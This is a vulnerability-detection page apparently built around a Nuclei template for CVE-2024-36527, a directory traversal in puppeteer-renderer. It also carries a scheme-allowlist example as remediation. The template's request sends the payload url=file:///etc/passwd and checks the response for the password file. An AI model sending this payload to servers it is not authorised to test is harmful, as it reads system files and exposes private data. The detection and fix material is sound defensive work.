Puppeteer Renderer - Directory Traversal
ID: CVE-2024-36527
Severity: medium
Author: Stux
Tags: cve,cve2024,puppeteer-renderer
Description
puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
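The remediation recorded in this template asks that the url parameter be restricted to http and https. One way to enforce that on the server, as an added example that is not puppeteer-renderer's own code (validateRenderUrl and ALLOWED_PROTOCOLS are hypothetical names, and the sample inputs are constructed):

```javascript
// Added example: scheme allowlist for a render endpoint's `url` parameter.
// validateRenderUrl and ALLOWED_PROTOCOLS are hypothetical names.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

function validateRenderUrl(raw) {
  // Query parsers can yield an array for ?url=a&url=b; accept one string only.
  if (typeof raw !== 'string' || raw.length === 0) {
    return { ok: false, reason: 'url must be a single non-empty string' };
  }
  let parsed;
  try {
    // The WHATWG parser trims surrounding whitespace and lowercases the
    // scheme, so the comparison below is made on the normalized protocol
    // rather than on a prefix of the raw string.
    parsed = new URL(raw);
  } catch {
    return { ok: false, reason: 'not an absolute URL' };
  }
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) {
    return { ok: false, reason: `scheme ${parsed.protocol} not allowed` };
  }
  // Hand the normalized form, not the raw input, to the browser.
  return { ok: true, url: parsed.href };
}

// Constructed sample inputs, including the value the template sends.
const SAMPLES = [
  'https://example.com/page',
  'http://example.com',
  'file:///etc/passwd',
  ' FILE:///etc/passwd',
  'ftp://example.com/file',
  '/etc/passwd',
];

function checkSamples() {
  return SAMPLES.map((s) => ({ input: s, ...validateRenderUrl(s) }));
}

for (const r of checkSamples()) {
  console.log(JSON.stringify(r.input), '->', r.ok ? r.url : `rejected (${r.reason})`);
}
```

Call the check before the value reaches the browser navigation call and answer with a 400 when `ok` is false.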
YAML Source
id: CVE-2024-36527

info:
  name: Puppeteer Renderer - Directory Traversal
  author: Stux
  severity: medium
  description: |
    puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
  remediation: |
    Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
  reference:
    - https://github.com/zenato/puppeteer-renderer/issues/97
    - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2024,puppeteer-renderer

http:
  - method: GET
    path:
      - "{{BaseURL}}/html?url=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022006955f980bad3e25c4becf1c65ad9020298ec47002664fbc3da45e8f709d3e8902202085bcd4b690d388512cc3c059d8903fd27ba341ea7ad4517e3aad72f1c04ff7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36527.yaml"